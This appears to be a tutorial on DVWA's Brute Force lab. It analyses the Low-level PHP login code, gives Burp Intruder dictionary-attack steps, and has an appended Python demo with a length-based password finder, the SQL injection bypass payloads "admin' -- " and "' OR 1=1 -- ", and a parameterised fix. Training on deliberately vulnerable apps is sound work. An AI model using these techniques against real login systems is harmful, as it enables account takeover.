<h1>Brute Force (暴力破解)</h1>
<p>Published 2017-12-10, last modified 2018-09-04. Source: <a href="https://www.daycode.net/2159.html">https://www.daycode.net/2159.html</a>. Category: tutorials (jiaocheng); tag: brute-force.</p>
<p><strong>DVWA (Damn Vulnerable Web Application) is a PHP/MySQL web application built for security vulnerability assessment. It gives security professionals a legal environment in which to test their skills and tools, and helps web developers better understand the process of defending web applications.</strong></p>
<p><strong>Brute Force (暴力破解) means an attacker guessing a user's password by exhaustively trying candidates from a password dictionary. It is one of the most widely used attack techniques today; the 12306 "credential stuffing" (撞库) incident that made national news in 2014 was in essence a brute-force attack: credential stuffing replays leaked username/password pairs instead of a wordlist, but the mechanism, automated guessing against a login endpoint, is the same.</strong></p>
<p><strong>Note that the DVWA 1.9 code comes in four security levels: Low, Medium, High and Impossible. Beginners can compare the code for the four levels and get some exposure to PHP code auditing.</strong></p>
<p><b>The code for the four levels is analysed below.</b></p>
<h3><b>Low</b>: server-side core code</h3>
<pre><code class="language-php">&lt;?php

if( isset( $_GET[ 'Login' ] ) ) {
    // Get username
    $user = $_GET[ 'username' ];

    // Get password
    $pass = $_GET[ 'password' ];
    $pass = md5( $pass );

    // Check the database
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
    $result = mysql_query( $query ) or die( '&lt;pre&gt;' . mysql_error() . '&lt;/pre&gt;' );

    if( $result &amp;&amp; mysql_num_rows( $result ) == 1 ) {
        // Get users details
        $avatar = mysql_result( $result, 0, "avatar" );

        // Login successful
        echo "&lt;p&gt;Welcome to the password protected area {$user}&lt;/p&gt;";
        echo "&lt;img src=\"{$avatar}\" /&gt;";
    }
    else {
        // Login failed
        echo "&lt;pre&gt;&lt;br /&gt;Username and/or password incorrect.&lt;/pre&gt;";
    }

    mysql_close();
}

?&gt;
</code></pre>
<p><strong>As the code shows, the server only checks whether the parameter Login is set (PHP's isset function tests whether a variable is set and returns a boolean, true or false). There is no anti-brute-force mechanism of any kind: no attempt counter, no lockout, no delay. The username and password parameters are not filtered at all, so there is an obvious SQL injection vulnerability. Because password is passed through md5() before it reaches the query, the injection point is the username parameter. The hash is unsalted MD5, so a leaked users table would also be cheap to crack offline.</strong></p>
<hr />
<p><b>The brute-force attack can be carried out with Burp Suite</b></p>
<p>Step 1: capture the login request</p>
<p><img src="http://image.3001.net/images/20161009/14760003309956.png!small" width="690" height="270" alt="Brute Force illustration" /></p>
<p>Step 2: press Ctrl+I to send the request to the Intruder module. Since the password parameter is the one to brute force, wrap its value in Intruder's payload position markers (§).</p>
<p><img src="http://image.3001.net/images/20161009/1476000296331.png!small" width="628" height="251" alt="Brute Force illustration 1" /></p>
<p>Step 3: open Payloads, load the dictionary, and click Start attack to run the brute force</p>
<p><img src="http://image.3001.net/images/20161009/14760003769188.png!small" width="628" height="508" alt="Brute Force illustration 2" /></p>
<p>Finally, look for the correct password in the attack results. Every failed attempt returns the same fixed "Username and/or password incorrect." body, so the response length (Length column) for the candidate "password" stands out from the others, and "password" can be inferred to be the correct password. Verify it by logging in manually.</p>
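<p>The Intruder procedure above and the SQL injection noted in the code analysis, as an added example that is not part of the original post and not DVWA's own code: a Python re-implementation of the Low handler's query logic over an in-memory SQLite table (DVWA itself uses MySQL; the sample users, their MD5 hashes, the avatar paths and the wordlist are all constructed here), a dictionary attack that picks the hit by the odd-one-out response length, the injection through the unfiltered username parameter, and a bound-parameter query that closes the injection but not the brute force.</p>

```python
import hashlib
import sqlite3
from collections import Counter

# Constructed sample data standing in for DVWA's `users` table. Assumption:
# the Low level stores unsalted MD5 hashes, as the md5() call in the PHP shows.
SAMPLE_USERS = [
    ("admin", "password", "/hackable/users/admin.jpg"),
    ("gordonb", "abc123", "/hackable/users/gordonb.jpg"),
]

# Constructed wordlist; a real run would load a file such as rockyou.txt.
WORDLIST = ["123456", "letmein", "qwerty", "password", "admin", "abc123"]

FAIL_BODY = "<pre><br />Username and/or password incorrect.</pre>"


def make_db():
    """In-memory SQLite stand-in for DVWA's MySQL database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, password TEXT, avatar TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(u, hashlib.md5(p.encode()).hexdigest(), a) for u, p, a in SAMPLE_USERS],
    )
    return conn


def low_login(conn, params):
    """Re-implementation of the DVWA Low handler: same string-built query,
    same 'exactly one row' check, same two response bodies."""
    if "Login" not in params:
        return ""
    user = params["username"]
    pw_hash = hashlib.md5(params["password"].encode()).hexdigest()
    # $user is interpolated verbatim, exactly as in the PHP; $pass is hashed first.
    query = f"SELECT * FROM `users` WHERE user = '{user}' AND password = '{pw_hash}';"
    rows = conn.execute(query).fetchall()
    if len(rows) == 1:
        avatar = rows[0][2]
        return (f"<p>Welcome to the password protected area {user}</p>"
                f'<img src="{avatar}" />')
    return FAIL_BODY


def login_request(conn, username, password):
    """One Intruder request: GET ?username=...&password=...&Login=Login."""
    return low_login(conn, {"username": username, "password": password, "Login": "Login"})


def dictionary_attack(conn, username, wordlist):
    """Replay of the Intruder run. Every failure returns the same fixed body,
    so a hit is any candidate whose response length differs from the
    majority length, which is the heuristic used in the write-up."""
    lengths = {pw: len(login_request(conn, username, pw)) for pw in wordlist}
    majority_len, _ = Counter(lengths.values()).most_common(1)[0]
    return [pw for pw, n in lengths.items() if n != majority_len]


def sqli_bypass(conn, payload):
    """Authenticate through the username parameter alone; the password is irrelevant."""
    return "Welcome" in login_request(conn, payload, "irrelevant")


def parameterised_login(conn, username, password):
    """Same check with a bound-parameter query: this closes the injection. It
    does nothing about brute force or the unsalted MD5, which need rate
    limiting and a real password hash (bcrypt/argon2) respectively."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    rows = conn.execute(
        "SELECT * FROM users WHERE user = ? AND password = ?", (username, pw_hash)
    ).fetchall()
    return len(rows) == 1


if __name__ == "__main__":
    db = make_db()
    print("dictionary hits for admin:", dictionary_attack(db, "admin", WORDLIST))
    # Comment out the rest of the WHERE clause: one row for admin, login succeeds.
    print("admin' -- :", sqli_bypass(db, "admin' -- "))
    # Classic OR 1=1 returns every user; the handler insists on exactly one row, so it fails.
    print("' OR 1=1 -- :", sqli_bypass(db, "' OR 1=1 -- "))
    print("parameterised, injected:", parameterised_login(db, "admin' -- ", "x"))
```

<p>The length heuristic works here because the failure body is constant; against an application whose error page carries a nonce, a timestamp or the echoed username, sort Intruder results by status code or grep for the "Welcome" marker instead. The <code>' OR 1=1 --</code> case is worth noting: the handler's <code>mysql_num_rows == 1</code> check defeats the textbook payload whenever the table holds more than one user, which is why targeting a known username with a comment suffix is the reliable bypass.</p>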